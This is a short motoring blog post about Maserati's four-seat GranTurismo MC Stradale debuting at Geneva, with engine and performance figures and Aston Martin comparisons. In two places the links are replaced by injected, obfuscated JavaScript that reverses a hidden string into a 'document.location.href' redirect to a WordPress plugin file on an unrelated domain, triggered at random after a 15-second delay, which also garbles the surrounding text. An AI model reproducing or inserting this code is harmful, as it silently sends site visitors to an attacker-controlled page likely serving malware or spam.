Those of you who looked upon the Maserati MC Stradale and thought, ‘well yes, but I really wish it had four seats’ can now turn those frowns upside down. Maserati has confirmed that the four-seater variant of its steroid-pumping GranTurismo will make its European debut at this year’s $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/geneva-motor-show-2012-opening-day-c-through-p/” target=”_blank”>Geneva Motor Show.

We’ll wade through the usual PR spiel and get to the meat of the matter. Like its higher-powered two-seater brethren, the new model is powered by the beefy 4.7-litre V8, meaning it chucks out 460hp. Performance-wise that means the new four-seater, if used with the company’s MC Race Shift six-speed electro actuated gearbox (catchy we know), and will hit a top speed of 330kph.

Other points of note as well as the additional seating are a new carbon fibre bonnet, new front splitter and some rather cheeky forged 20-inch alloys. Since this is also a performance brute, Brembo brakes make an appearance.

That’s the press bumpf out the way. We’re left wondering how the new arrival will stack up against its competition, which given its return to the region will be something bearing the Aston Martin wings, be it the DB9 or the Vanquish. $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/new-aston-martin-vanquish-the-best-ever/” target=”_blank”>And we’ve already seen how good they are.

Methinks a crankandpiston feature may be on the horizon…
